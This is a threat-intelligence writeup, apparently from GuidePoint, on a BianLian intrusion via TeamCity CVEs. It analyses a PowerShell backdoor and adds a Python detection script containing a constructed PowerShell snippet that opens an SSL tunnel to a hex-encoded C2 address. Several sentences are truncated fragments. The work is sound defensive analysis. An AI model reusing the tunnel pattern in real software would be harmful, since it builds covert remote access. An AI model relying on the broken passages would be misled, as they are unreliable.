In conjunction with GuidePoint's DFIR team, we responded to an incident that began with the exploitation of a TeamCity server which resulted in the deployment of a PowerShell implementation of BianLian's GO backdoor.
The threat actor identified a vulnerable TeamCity server and leveraged CVE-2024-27198 / CVE-2023-42793 for initial access into the environment, creating users in TeamCity and invoking malicious commands under the TeamCity product's service account.
Exe on the build servers to remotely run commands from the exploited TeamCity server and leveraged BITSAdmin to deploy additional tools, including a malicious PowerShell script, web.
The threat actor was detected in the environment after attempting to conduct a Security Accounts Manager credential dumping technique, which alerted the victim's VSOC, GuidePoint's DFIR team, and GuidePoint's Threat Intelligence Team and initiated the in-depth review of this PowerShell backdoor.
After multiple failed attempts to execute their standard GO backdoor, the threat actor pivoted to living off the land and leveraged a PowerShell implementation of their backdoor, which provides an almost identical functionality to what they would have with their GO backdoor.
First Level Analysis
The PowerShell backdoor was obfuscated but didn't leverage any novel techniques that significantly hindered analysis.
Second Layer Analysis
At first glance, the second layer of the PowerShell script was an absolute mess, so we were less than excited to proceed.
Multiple methods were called throughout the script regarding SSL streams and TCP sockets, which gave this script more of a tunnel or backdoor feel than a simple downloader, but more analysis was needed to be sure.
As we continued our analysis, we realized that the cookies function was responsible for a majority of the network connection management and high-level execution performed by the suspected backdoor.
Perhaps the most interesting component of this whole backdoor was the innovative use of the Runspace Pool in conjunction with the.
In past analysis of malicious PowerShell scripts, attackers have commonly leveraged Invoke-Command or Invoke-Expression as a means of executing malicious code, which provides a less asynchronous and potentially more detectable method of executing commands.
Network Capability Callouts
At this stage of analysis, we have all but confirmed that this is a backdoor that allows a remote attacker to arbitrarily conduct operations on an infected system, much as BianLian's GO trojan does.
What puts the icing on the cake is confirming all the networking capabilities associated with this script and confirming that these are the same types of capabilities observed with other backdoors and, especially, BianLian's GO backdoor.
One thing that BianLian is known for in regard to their GO backdoor is the use of certificates for authentication; in fact, that's how many security researchers proactively identify their infrastructure.
This type of behavior has been replicated in the PowerShell implementation of their backdoor as well.
The main advantage of this backdoor, as we have seen with BianLian's GO implementation, is that it provides flexibility during post-exploitation activities while masking activity within an encrypted tunnel.
As previously mentioned, the last line of the PowerShell script we analyzed showed the calling of the cookies function with some specified parameters.
When the hexadecimal value passed in Cookies Param1 is converted into dotted-decimal notation, the resulting IP address is 136[.]0[.]3[.]71. A quick OSINT search shows that, according to C2IntelFeeds, this IP address is associated with a server that was running the BianLian GO backdoor as of March 6th, 2024, which corresponds to activity observed within this incident.
D shortly before the first successful execution of the PowerShell backdoor.
Based on these findings of shared infrastructure and AV detections, GRIT assesses with high confidence that the analyzed PowerShell script is a PowerShell implementation of the BianLian GO backdoor.
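As an added triage example (not code from the original report or from GuidePoint), the script-block check below looks for the capability combination described above (runspace pool, SslStream, TCP socket) and decodes 32-bit hex literals into IPv4 candidates the way the Cookies Param1 value was decoded. The PowerShell sample is constructed; the literal 0x88000347 is assumed as a value that decodes to 136.0.3.71 and is not taken from the page.

```python
import re
import ipaddress

# Capability indicators the analysis above attributes to the backdoor: asynchronous
# execution through a runspace pool, SSL-wrapped TCP sockets, and (for contrast)
# the more detectable Invoke-Expression pattern.
CAPABILITY_PATTERNS = {
    "runspace_pool": re.compile(r"RunspacePool", re.I),
    "ssl_stream": re.compile(r"Net\.Security\.SslStream", re.I),
    "tcp_socket": re.compile(r"Net\.Sockets\.(TcpClient|Socket)\b", re.I),
    "invoke_expression": re.compile(r"\bInvoke-Expression\b|\biex\b", re.I),
}
# 32-bit hex literals are the form in which the C2 address was passed to cookies.
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]{1,8})\b")

# Constructed sample modelled on the behaviour described above; the literal
# 0x88000347 is an assumed value chosen because it decodes to 136.0.3.71.
SAMPLE_SCRIPT = r"""
$pool = [RunspaceFactory]::CreateRunspacePool(1, 4); $pool.Open()
$client = New-Object System.Net.Sockets.TcpClient
$ssl = New-Object System.Net.Security.SslStream($client.GetStream(), $false, {$true})
$flags = 0x1
cookies 0x88000347 443
"""

def hex_to_ipv4(token: str) -> str:
    """Decode a 32-bit hex literal such as 0x88000347 into dotted-quad notation."""
    return str(ipaddress.IPv4Address(int(token, 16)))

def candidate_ips(script: str) -> list:
    """Return de-duplicated, publicly routable IPv4 addresses hidden as hex literals.
    Small constants (0x1 -> 0.0.0.1) and reserved ranges are dropped."""
    found = []
    for match in HEX_LITERAL.finditer(script):
        ip = ipaddress.IPv4Address(int(match.group(1), 16))
        if ip.is_global and str(ip) not in found:
            found.append(str(ip))
    return found

def triage(script: str) -> dict:
    """Summarise which capabilities a script block exhibits and whether the
    tunnel-plus-runspace combination and a decoded C2 address occur together."""
    caps = [name for name, pat in CAPABILITY_PATTERNS.items() if pat.search(script)]
    ips = candidate_ips(script)
    tunnel = {"runspace_pool", "ssl_stream", "tcp_socket"} <= set(caps)
    return {"capabilities": caps, "candidate_ips": ips, "suspicious": tunnel and bool(ips)}

if __name__ == "__main__":
    print(triage(SAMPLE_SCRIPT))
```

Running the same function over PowerShell script-block log entries (Event ID 4104) gives a quick first-pass filter before manual deobfuscation.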
This Cyber News was published on securityboulevard.com. Publication date: Sat, 09 Mar 2024 15:43:05 +0000